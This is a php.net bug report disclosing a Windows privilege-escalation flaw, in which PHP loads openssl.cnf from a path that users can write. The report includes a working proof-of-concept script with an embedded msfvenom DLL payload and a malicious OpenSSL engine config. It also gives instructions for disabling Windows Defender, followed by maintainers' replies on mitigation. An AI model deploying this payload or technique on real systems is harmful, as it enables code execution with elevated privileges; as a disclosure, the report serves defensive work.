php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #78557 PHP for Windows Elevation of Privilege
Submitted: 2019-09-18 09:09 UTC Modified: 2019-10-09 09:44 UTC
From: zhutq2 at knownsec dot com Assigned: cmb (profile)
Status: Closed Package: OpenSSL related
PHP Version: 7.3.9 OS: Windows 10
Private report: No CVE-ID: None
View Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
If you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: zhutq2 at knownsec dot com
New email:
PHP Version: OS:

 

 [2019-09-18 09:09 UTC] zhutq2 at knownsec dot com
Description:
------------
PHP Version: php-7.3.9-Win32-VC15-x64
Os Version: Windows 10.0.18362 N/A Build 18362
Description: 
If php.exe load openssl extension or curl extension, When php.exe is executed it attempts to load openssl.cnf from C:\\usr\\local\\ssl\\openssl.cnf.By default on windows, low privileged users have the authority to create folders under c:. A low privileged user can create a custom openssl.cnf file to load a malicious OpenSSL Engine(library). The result is arbitrary code execution with the full authority of the account executing the php.exe.

Because Apache2 will run apache2 service with SYSTEM privileged by default.If Apache2 use mod_php function to load php, After Apache2 Server restart, Attacker can get SYSTEM privileged by this vulnerability.

Here are some similar examples:
1. https://hackerone.com/reports/608577
2. https://hackerone.com/reports/162955
3. https://www.google.com/search?q=openssl.cnf+elevation+of+privilege

I write a script to create the custom openssl.cnf file and the malicious OpenSSL library calc.dll.After you run the eop.php,you run php.exe as any user, calc.exe will appear.

```
C:\Users\Admin>tasklist /v|find "Calc"

C:\Users\Admin>dir C:\usr\local\ssl
The system cannot find the path specified.

C:\Users\Admin>C:\php\php.exe C:\Users\Admin\Desktop\eop.php

C:\Users\Admin>tasklist /v|find "Calc"

C:\Users\Admin>dir C:\usr\local\ssl
 Volume in drive C has no label.
 Volume Serial Number is A654-1265

 Directory of C:\usr\local\ssl

09/18/2019  09:53 AM    <DIR>          .
09/18/2019  09:53 AM    <DIR>          ..
09/18/2019  09:53 AM             5,120 calc.dll
09/18/2019  09:53 AM               194 openssl.cnf
               2 File(s)          5,314 bytes
               2 Dir(s)  21,862,887,424 bytes free

C:\Users\Admin>C:\php\php.exe

C:\Users\Admin>tasklist /v|find "Calc"
ApplicationFrameHost.exe      5564 Console                    1     31,196 K Running         DESKTOP-V4NN18O\Admin                                   0:00:05 Calculator
Calculator.exe                5852 Console                    1     66,156 K Running         DESKTOP-V4NN18O\Admin                                   0:00:01 CicMarshalWnd
```

This is Process Monitor screenshot.
https://images.seebug.org/content/images/2019/09/c57c32f4-ab5b-4117-a0aa-c7941ddbd267.png-w331s
php.exe will load the custom openssl.cnf and load the malicious OpenSSL library.

Test script:
---------------
<?php
/*
Because I use `msfvenom` create a malicious dll,so Windows Defender will delete the php file and C:\\usr\\local\\ssl\\calc.dll.
You can close Real-time protection (Settings -> Update & Security -> Windows Security -> Open Windows Security -> Virus & threat protection -> Manage settings) or compile a malicious OpenSSL Engine library by yourself(reference: https://hackerone.com/reports/608577) to avoid this problem.
*/
//create malicious dll by command: msfvenom -p windows/x64/exec CMD="calc.exe" -a x64 -f dll|base64 -w 0
$malicious_calc_dll_base64 = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHJ1bmRsbDMyLmV4ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAFwQAABIIAAAcBAAAJwRAABQIAAAsBEAAOIRAABYIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";
// the content of C:\\usr\\local\\ssl\\openssl.cnf
$openssl_cnf_content = "openssl_conf = openssl_init\r\n[openssl_init]\r\nengines = engine_section\r\n[engine_section]\r\nfoo = foo_section\r\n[foo_section]\r\nengine_id = foo\r\ndynamic_path = C:\\\\usr\\\\local\\\\ssl\\\\calc.dll\r\ninit = 0";
if(!is_dir("C:\\usr\\local\\ssl\\")){
  mkdir("C:\\usr\\local\\ssl\\",777,true);
}
$fp = fopen("C:\\usr\\local\\ssl\\calc.dll","w");
fwrite($fp, base64_decode($malicious_calc_dll_base64));
fclose($fp);
$fp = fopen("C:\\usr\\local\\ssl\\openssl.cnf","w");
fwrite($fp, $openssl_cnf_content);
fclose($fp);
?>


Expected result:
----------------
After you run eop.php, "C:\usr\local\ssl\openssl.cnf" and "C:\usr\local\ssl\calc.exe" will created.
If you run any php script again, calc.exe will appear.



Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-09-18 13:45 UTC] cmb@php.net
I fail to see why that would be a real security issue for PHP. I
mean, if you let untrusted users execute arbitrary PHP code you're
already screwed.  And you certainly don't have accounts for users
which you don't trust on a Webserver.

Nonetheless I think that changing the default path of openssl.cnf
is an additional security measure, but the simplest way to do that
is to set the OPENSSL_CONF environment variable[1] (much simpler
than upgrading), so in my opinion, we should improve the
documentation (i.e. add a cautionary note), and change the default
path for PHP 8 (or perhaps for 7.4).

[1] <https://www.php.net/manual/en/openssl.installation.php>
 [2019-09-18 14:09 UTC] cmb@php.net
-Package: cURL related +Package: OpenSSL related
 [2019-09-19 03:12 UTC] zhutq2 at knownsec dot com
I'm sorry, maybe my submission report didn't make it clear in some details that led you to not recognize the correct attack scenario.

The key point of this vulnerability is not that the user executed the code, Because https://bugs.php.net/report.php needs test script when I report the issue, so I wrote a php code to reproduce the problem.

The key point of this vulnerability is:
After a low privileged user create a custom openssl.cnf file to load a malicious OpenSSL library, Any User try to run php.exe will load the malicios OpenSSL library.

For examples:
1. An attacker get a low privileged user's password and login by remote desktop.The attacker can't do more bacause this is just a low privileged user.The attacker find Apache and php running in this server.The attacker create the openssl.cnf and malicios dll and wait. After the Administrator account restart Apache2, The attacker can get SYSTEM privileged. Bacause Apache2 service running by SYSTEM privileged.

2. An attacker get a low privileged user's password and login by remote desktop.The attacker can't do more bacause this is just a low privileged user, But the attacker find a php script will being run every hour to clear temporary files, the php script being run by high privileged.The attacker create the openssl.cnf and malicios dll and wait.After one hour, The attacker get the high privileged.

3. The security issue can also bypass disable_functions. An attacker get a webshell on server,the webshell can eval any php code, can't run any command bacause the disable_functions. The attacker use php code create the openssl.cnf and malicios.dll, After webserver restart or crash the php-cgi.exe, the attacker can run any command by load malicios.dll.
 [2019-09-19 10:29 UTC] ab@php.net
Thanks so much for depicting your research, @zhutq2. A compromised system will of course have to carry any heavy consequences. It is equally bad on any OS and is about a general system security, it is equally possible to do a lot of harm having direct access to a system, it is equally bad on an misconfigured system. Specific to Windows is - a network exposed service like a web server MUST use impersonation. Compare same, exposing a web server worker running under root to the web. Especially also talking about a shared hosting on Windows, the system configuration is complex.

So this is in first place subject of the surrounding configuration, which is fixed by

- utilizing impersonation
- OPENSSL_CONF, as cmb69 mentioned, is helpful, too
- carefully setting file permissions and ownership 
- carefully managing user accounts and their access to the system
- utilizing security monitoring

If these and other security measures are neglected on a given system, it's over anyway. From the illustrated cases, all of them are based on an assumption, that the system security has been neglected in first place. Please note also, that while we ship openssl.cnf, we don't enforce to put it into a particular path - OPENSSL_CONF variable is what can be used to control it. The access permissions to that particular file, or to the PHP scripts whatsoever is something we also have no influence.

It is known, that the OpenSSL project has changed the default paths to point inside c:\windows\. Changing the default path within a stable branch in PHP seems not justified, as it will cause more harm by breaching BC than fixing something. We still might check to adjust it in master or alike, to be inline with the OpenSSL defaults.

Appreciate your efforts.

Thanks.
 [2019-09-22 19:05 UTC] stas@php.net
I think it makes sense to change it in master/7.4 if openssl changed it, and add a note in UPGRADING. Maybe also add a note to the docs.
 [2019-09-23 06:50 UTC] zhutq2 at knownsec dot com
It seems that OPENSSL fixes a similar vulnerability(CVE-2019-1552) in some affected versions. You can find the description of CVE-2019-1552 and the git commit record in reference link.

I think that when the user does not set the OPENSSL_CONF, SSLEAY_CONF environment variable, it is a good solution to load a openssl.cnf that cannot be controlled by a low-privileged user by default. For example: C:\Program Files (x86)\OpenSSL\ssl\openssl.cnf or C:\Program Files (x86)\Common Files\SSL\openssl.cnf.

Add a note to the docs is good news for older versions of php. Users can avoid this vulnerability by setting the OPENSSL_CONF environment variable.

[1] <https://www.openssl.org/news/vulnerabilities.html>
[2] <https://www.openssl.org/news/secadv/20190730.txt>
[3] <https://github.com/openssl/openssl/commit/54aa9d51b09d67e90db443f682cface795f5af9e>
[4] <https://github.com/openssl/openssl/commit/e32bc855a81a2d48d215c506bdeb4f598045f7e9>
 [2019-09-23 07:03 UTC] zhutq2 at knownsec dot com
Set the OPENSSL_CONF system environment variable in Windows system, not use putenv() function in php script, not set current user environment variable, too.

Control Panel -> System and Security -> System -> Advanced system settings -> Advanced -> Environment Variables -> System variables -> New
 [2019-09-23 07:28 UTC] cmb@php.net
-Assigned To: +Assigned To: cmb
 [2019-09-23 07:28 UTC] cmb@php.net
> I think it makes sense to change it in master/7.4 […]

ACK, we should consider that.  This is, however, not related to
php-src, but rather to the Windows builds of OpenSSL[1], and
changing the default path would be as simple as changing the value
of the --openssldir configure option, re-building the relevant
packages, and re-building PHP.

[1] <https://github.com/winlibs/openssl>
[2] <https://wiki.php.net/internals/windows/libs#library_dependencies>
 [2019-09-23 14:48 UTC] ab@php.net
D'accord with Stas' suggestion, 7.4+ and doc is sufficient.

Thanks.
 [2019-10-07 07:31 UTC] cmb@php.net
-Status: Assigned +Status: Closed -Type: Security +Type: Bug
 [2019-10-07 07:31 UTC] cmb@php.net
The default OpenSSL config path has been changed for PHP
7.4+[1][2], the official PHP 7.4.0RC3 Windows builds already use
this, and the docs now have a cautionary note regarding this
issue, which is not a security issue per se.  Therefore I'm
(dis)closing this ticket.

[1] <https://github.com/php/php-src/blob/b142e8a4b3e82c49600edc3469d09b4febb889ee/UPGRADING#L702-L704>
[2] <http://svn.php.net/viewvc?view=revision&revision=348111>
 [2019-10-08 09:05 UTC] zhutq2 at knownsec dot com
I revisited all previous comments, I think @cmb doesn't think this is a security issue because: 

This is not related to php-src, but rather to the Windows builds of OpenSSL.

I don't think so. As we all know, Openssl is a open source software library and anyone can use it. Openssl should responsible for itself, but it is not responsible for all software that uses it. 

Openssl fix the vulnerability(CVE-2019-1552) in 30 July 2019, But the openssl extention in php-src didn't keep in sync with openssl official. So the vulnerability still effect openssl extention until I report it. Build script and build parameters not in php-src source code but it is the base of php-src. You can't separate them.

Curl for Windows has a similar vulnerability (CVE-2019-5443) [1][2] and I need a CVE-ID too.

1. <https://hackerone.com/reports/608577>
2. <https://curl.haxx.se/docs/CVE-2019-5443.html>
 [2019-10-09 04:56 UTC] zhutq2 at knownsec dot com
-Status: Closed +Status: Open
 [2019-10-09 04:56 UTC] zhutq2 at knownsec dot com
> Resubmit comment to open the issue. I think this is a security issue in php and need a CVE-ID.

As we all know, Openssl is an open source software library and anyone can use it. Openssl should responsible for itself, but it is not responsible for all software that uses it. 

Openssl fix the vulnerability(CVE-2019-1552) in 30 July 2019, But the openssl extention in php-src didn't keep in sync with openssl official. So the vulnerability still effect openssl extention until I report it. Build script and build parameters not in php-src source code but it is the base of php-src. You can't separate them.

Curl for Windows has a similar vulnerability (CVE-2019-5443) [1][2] and I need a CVE-ID too.

1. <https://hackerone.com/reports/608577>
2. <https://curl.haxx.se/docs/CVE-2019-5443.html>
 [2019-10-09 09:44 UTC] cmb@php.net
-Status: Open +Status: Closed
 [2019-10-09 09:44 UTC] cmb@php.net
It has been explained in detail why this isn't a security
regarding PHP[1].

Please refrain from re-opening this ticket again.

Thanks.

[1] <https://bugs.php.net/78557#1568888952>
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Fri Nov 08 14:01:28 2024 UTC